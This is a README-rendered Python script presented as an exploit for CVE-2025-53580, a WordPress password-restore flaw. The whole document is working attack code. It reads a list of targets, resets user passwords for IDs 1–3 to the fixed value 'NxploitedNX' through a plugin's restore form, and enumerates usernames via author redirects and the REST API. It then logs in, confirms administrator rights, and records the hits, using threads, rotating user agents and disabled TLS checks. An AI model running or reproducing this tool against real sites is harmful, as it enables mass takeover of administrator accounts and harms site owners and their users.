README.md
Rendering markdown...
#!/usr/bin/env python3
# By: Nxploited
import os
import sys
import time
import random
from datetime import datetime
from typing import List, Set, Tuple, Optional, Dict
from urllib.parse import urlparse
import requests
import re
import json as _json
try:
from colorama import Fore, Style, init as colorama_init
colorama_init(autoreset=True)
except Exception:
class _D:
RESET = ""
RED = ""
GREEN = ""
YELLOW = ""
CYAN = ""
MAGENTA = ""
BLUE = ""
WHITE = ""
BRIGHT = ""
Fore = _D()
Style = _D()
requests.packages.urllib3.disable_warnings()
TERM_WIDTH = 80
RESULT_FILE = "Nx_sbd_login_hits.txt"
NEW_PASS = "NxploitedNX"
MAX_USER_ID = 3
BASE_HEADERS = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.9",
"Cache-Control": "no-cache",
"Pragma": "no-cache",
"Upgrade-Insecure-Requests": "1",
"DNT": "1",
}
UA_POOL = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 "
"(KHTML, like Gecko) Version/17.0 Safari/605.1.15",
"Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36",
]
CANDIDATE_RESTORE_PATHS = [
"/login",
"/log-in",
"/signin",
"/sign-in",
"/user-login",
"/account/login",
"/account/log-in",
"/restore",
"/password-reset",
"/reset-password",
"/lost-password",
"/lostpassword",
"/user/restore",
"/my-account",
"/members/login",
"/member-login",
"/customer-login",
"/wp-login.php",
"/blog/login",
"/blog/log-in",
"/auth/login",
"/auth/restore",
"/sbd-login",
"/sbd-restore",
]
AUTHOR_PATTERN = re.compile(r"/author/([^/]+)")
AUTHOR_BODY_PATTERNS = [
re.compile(r'author-\w+">([a-z0-9_-]+)<', re.IGNORECASE),
re.compile(r"/author/([a-z0-9_-]+)/", re.IGNORECASE),
re.compile(r'"slug":"([a-z0-9_-]+)"', re.IGNORECASE),
re.compile(r'"username":"([a-z0-9_-]+)"', re.IGNORECASE),
]
def center(text: str, width: int = TERM_WIDTH) -> str:
text = text.rstrip("\n")
length = len(text)
if length >= width:
return text
pad = (width - length) // 2
return " " * pad + text
def print_banner() -> None:
os.system("cls" if os.name == "nt" else "clear")
banner = [
" ___ _ ___ __ __ __ ____ ____ ___ ____ __ __ ",
" / (_)(_| |_// (_) / )/ \\/ )| | / \\| / \\ / \\ ",
" | | | \\__ /| | / |___ |___ __/|___ \\__/| |",
" | | | / -----/ | |/ \\----- \\ \\ \\/ \\| |",
" \\___/ \\_/ \\___/ /___\\__//___\\___/ \\___/\\___/\\___/\\__/ \\__/ ",
]
for line in banner:
print(Fore.CYAN + Style.BRIGHT + center(line) + Style.RESET_ALL)
print(Fore.MAGENTA + center("Exploit for | CVE-2025-53580", TERM_WIDTH) + Style.RESET_ALL)
print(Fore.WHITE + center("Nxploited ( Khaled ALenazi )", TERM_WIDTH) + Style.RESET_ALL)
print(Fore.WHITE + center("Telegram: @Kxploit | GitHub: github.com/Nxploited", TERM_WIDTH) + Style.RESET_ALL)
print()
print(Fore.YELLOW + center("Use strictly in environments where you have explicit authorization.", TERM_WIDTH) + Style.RESET_ALL)
print()
def log_line(level: str, color: str, msg: str) -> None:
print(f"{color}[{level.upper()}]{Style.RESET_ALL} {msg}")
def log_info(msg: str) -> None:
log_line("info", Fore.BLUE, msg)
def log_warn(msg: str) -> None:
log_line("warn", Fore.YELLOW, msg)
def log_err(msg: str) -> None:
log_line("err ", Fore.RED, msg)
def log_ok(msg: str) -> None:
log_line("ok ", Fore.GREEN, msg)
def get_random_user_agent() -> str:
return random.choice(UA_POOL)
def build_headers(referer: Optional[str] = None) -> dict:
h = dict(BASE_HEADERS)
h["User-Agent"] = get_random_user_agent()
if referer:
h["Referer"] = referer
return h
def normalize_url(url: str) -> str:
url = url.strip()
if not url.startswith(("http://", "https://")):
url = "http://" + url
p = urlparse(url)
return f"{p.scheme}://{p.netloc}"
def new_session(timeout: int) -> requests.Session:
s = requests.Session()
s.verify = False
s.timeout = timeout
s.headers.update(build_headers())
adapter = requests.adapters.HTTPAdapter(pool_connections=20, pool_maxsize=20, max_retries=1)
s.mount("http://", adapter)
s.mount("https://", adapter)
return s
def enum_from_author_param(url: str, timeout: int, delay: float = 0.0) -> Set[str]:
users: Set[str] = set()
for i in range(1, 10):
try:
author_url = f"{url}/?author={i}"
headers = build_headers(author_url)
resp = requests.get(author_url, allow_redirects=False, timeout=timeout, verify=False, headers=headers)
if resp.status_code in (301, 302) and "location" in resp.headers:
location = resp.headers["location"]
m = AUTHOR_PATTERN.search(location)
if m:
users.add(m.group(1))
if delay > 0:
time.sleep(delay)
resp2 = requests.get(author_url, timeout=timeout, verify=False, headers=build_headers(author_url))
if resp2.status_code == 200:
body = resp2.text
for pat in AUTHOR_BODY_PATTERNS:
for u in pat.findall(body):
users.add(u)
if delay > 0:
time.sleep(delay)
except requests.RequestException:
continue
return users
def enum_from_rest_api(url: str, timeout: int, delay: float = 0.0) -> Set[str]:
users: Set[str] = set()
try:
api_url = f"{url}/wp-json/wp/v2/users"
headers = build_headers(api_url)
resp = requests.get(api_url, timeout=timeout, verify=False, headers=headers)
if resp.status_code == 200:
try:
data = resp.json()
if isinstance(data, list):
for user in data:
if isinstance(user, dict):
if "slug" in user:
users.add(str(user["slug"]))
if "username" in user:
users.add(str(user["username"]))
except ValueError:
pass
except requests.RequestException:
pass
if delay > 0:
time.sleep(delay)
return users
def enumerate_usernames(url: str, timeout: int, delay: float = 0.0) -> Set[str]:
users: Set[str] = set()
users.update(enum_from_author_param(url, timeout, delay))
users.update(enum_from_rest_api(url, timeout, delay))
users.add("admin")
try:
host = urlparse(url).netloc.split(":")[0]
domain_part = host.split(".")[0]
if domain_part and len(domain_part) > 2:
users.add(domain_part)
except Exception:
pass
return users
def find_restore_url_with_sbd(
session: requests.Session,
base: str,
timeout: int,
) -> Optional[str]:
for path in CANDIDATE_RESTORE_PATHS:
url = base.rstrip("/") + path
try:
r = session.get(url, timeout=timeout, verify=False, headers=build_headers(url))
except Exception:
continue
if r.status_code != 200:
continue
body = (r.text or "").lower()
if "sbd" in body:
log_ok(f"{base} :: found front-end sbd page at {url}")
return r.url
log_warn(f"{base} :: no sbd page found in candidate restore paths")
return None
def try_sbd_restore_for_user_ids(
session: requests.Session,
restore_url: str,
max_user_id: int,
timeout: int,
) -> None:
root = restore_url
log_info(f"{restore_url} :: starting qcpd-uid=1..{max_user_id} brute with pass={NEW_PASS}")
for uid in range(1, max_user_id + 1):
data = {
"qcpd-restore-pwd": "restore",
"qcpd-restore-pwd-type": "user",
"qcpd-uid": str(uid),
"pass": NEW_PASS,
}
headers = build_headers(restore_url)
headers["Content-Type"] = "application/x-www-form-urlencoded"
try:
r = session.post(root, data=data, headers=headers, timeout=timeout, verify=False, allow_redirects=False)
except Exception as e:
log_warn(f"{restore_url} :: POST uid={uid} failed: {e}")
continue
loc = r.headers.get("Location", "")
log_info(f"{restore_url} :: POST uid={uid} → status={r.status_code}, Location={loc or 'none'}")
def try_login_with_password(
base: str,
username: str,
password: str,
timeout: int
) -> Tuple[bool, requests.Session, str]:
root = base.rstrip("/")
s = new_session(timeout)
login_url = f"{root}/wp-login.php"
data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"testcookie": "1",
}
headers = build_headers(login_url)
headers["Content-Type"] = "application/x-www-form-urlencoded"
headers["Cookie"] = "wordpress_test_cookie=WP+Cookie+check"
try:
r = s.post(login_url, data=data, headers=headers, timeout=timeout, verify=False, allow_redirects=True)
except Exception as e:
return False, s, f"login_error:{e}"
logged_in = any(c.name.startswith("wordpress_logged_in") for c in s.cookies)
if not logged_in:
sc = r.headers.get("Set-Cookie", "")
if "wordpress_logged_in" in sc:
logged_in = True
if not logged_in:
return False, s, "login_failed_or_not_logged_in"
return True, s, "login_ok"
def check_admin_via_rest(session: requests.Session, base: str, timeout: int) -> Tuple[bool, str]:
rest_url = f"{base}/wp-json/wp/v2/users/me"
headers = build_headers(rest_url)
try:
r = session.get(rest_url, timeout=timeout, verify=False, headers=headers)
except Exception as e:
return False, f"rest_error:{e}"
if r.status_code != 200:
return False, f"rest_status:{r.status_code}"
try:
j = r.json()
except Exception:
return False, "rest_invalid_json"
caps = j.get("capabilities") or {}
if isinstance(caps, dict) and caps.get("manage_options"):
return True, "ADMIN_CONFIRMED_REST(manage_options)"
return False, "rest_no_manage_options"
def verify_admin_dashboard(session: requests.Session, base: str, timeout: int) -> Tuple[bool, str]:
root = base.rstrip("/")
admin_urls = [
f"{root}/wp-admin/users.php",
f"{root}/wp-admin/index.php",
f"{root}/wp-admin/",
]
global_markers = [
"wp-admin-bar",
"adminmenu",
"manage_options",
"update-core.php",
"options-general.php",
]
users_markers = [
"users.php",
'class="username"',
'table class="wp-list-table',
]
for u in admin_urls:
headers = build_headers(u)
try:
r = session.get(u, timeout=timeout, verify=False, headers=headers, allow_redirects=False)
except Exception:
continue
if r.status_code == 200:
body = (r.text or "").lower()
if any(m in body for m in global_markers):
if "users.php" in u or any(m in body for m in users_markers):
return True, f"ADMIN_CONFIRMED_WPADMIN({u})"
elif r.status_code in (301, 302):
loc = r.headers.get("Location", "") or r.headers.get("location", "")
if "wp-login.php" in loc:
return False, "wpadmin_redirect_login"
return False, "wpadmin_no_strong_markers"
def write_hit(
base: str,
username: str,
is_admin: bool,
detail: str,
out_file: str = RESULT_FILE
) -> None:
ts = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
admin_flag = "ADMIN" if is_admin else "USER"
line = (
f"[{ts}] {base} - type={admin_flag} - user={username} "
f"- login=/wp-login.php user={username} pass={NEW_PASS} - detail={detail}\n"
)
if "/" in out_file:
os.makedirs(os.path.dirname(out_file), exist_ok=True)
with open(out_file, "a", encoding="utf-8") as f:
f.write(line)
def handle_site(
site: str,
timeout: int,
) -> None:
base = normalize_url(site)
label = base
log_info(f"{label} :: starting")
sess = new_session(timeout)
restore_url = find_restore_url_with_sbd(sess, base, timeout)
if not restore_url:
log_warn(f"{label} :: no restore/login page with 'sbd' found, skipping target")
return
try_sbd_restore_for_user_ids(sess, restore_url, MAX_USER_ID, timeout)
log_info(f"{label} :: extracting usernames and trying login with fixed password {NEW_PASS!r}")
try:
users = enumerate_usernames(base, timeout, delay=0.0)
except Exception as e:
log_warn(f"{label} :: username enumeration failed: {e}")
users = set()
if not users:
log_warn(f"{label} :: no usernames discovered, fallback on admin only")
users = {"admin"}
for user in sorted(users):
log_info(f"{label} :: trying login for one candidate user with fixed password")
ok, s_login, detail_login = try_login_with_password(base, user, NEW_PASS, timeout)
if not ok:
log_warn(f"{label} :: login failed for user='{user}': {detail_login}")
continue
log_ok(f"{label} :: login OK for user='{user}', checking admin...")
rest_ok, rest_detail = check_admin_via_rest(s_login, base, timeout)
is_admin = False
detail = detail_login
if rest_ok:
is_admin = True
detail = rest_detail
else:
wp_ok, wp_detail = verify_admin_dashboard(s_login, base, timeout)
if wp_ok:
is_admin = True
detail = wp_detail
else:
detail = f"not_admin({rest_detail}, {wp_detail})"
write_hit(base, user, is_admin, detail)
log_ok(f"{label} :: HIT for user='{user}' → admin={is_admin}, detail={detail}")
return
log_info(f"{label} :: done, no successful login found using {NEW_PASS!r}")
def ask(prompt: str, default: str = "") -> str:
if default:
s = input(f"{Fore.CYAN}{prompt}{Style.RESET_ALL} [{default}]: ").strip()
return s if s else default
return input(f"{Fore.CYAN}{prompt}{Style.RESET_ALL}: ").strip()
def ask_int(prompt: str, default: int) -> int:
s = ask(prompt, str(default))
try:
return int(s)
except Exception:
return default
def run() -> None:
print_banner()
tfile = ask("Targets list file (one host/URL per line)", "list.txt")
if not os.path.exists(tfile):
log_err(f"Targets file not found: {tfile}")
sys.exit(1)
threads = ask_int("Threads (concurrent sites)", 3)
timeout = ask_int("HTTP timeout (seconds)", 10)
out_file = ask("Successful hits file", RESULT_FILE)
targets: List[str] = []
with open(tfile, "r", encoding="utf-8", errors="ignore") as f:
for line in f:
line = line.strip()
if line:
targets.append(line)
if not targets:
log_err("Targets file is empty.")
sys.exit(1)
log_info(f"Loaded {len(targets)} targets.")
start = time.time()
from concurrent.futures import ThreadPoolExecutor, as_completed
with ThreadPoolExecutor(max_workers=threads) as ex:
futures = []
for site in targets:
fut = ex.submit(handle_site, site, timeout)
futures.append(fut)
try:
for _ in as_completed(futures):
pass
except KeyboardInterrupt:
log_warn("Interrupted by user, shutting down threads...")
ex.shutdown(wait=False, cancel_futures=True)
sys.exit(1)
elapsed = time.time() - start
log_ok(f"Finished in {elapsed:.2f}s")
log_ok(f"Confirmed hits written to: {out_file}")
if __name__ == "__main__":
run()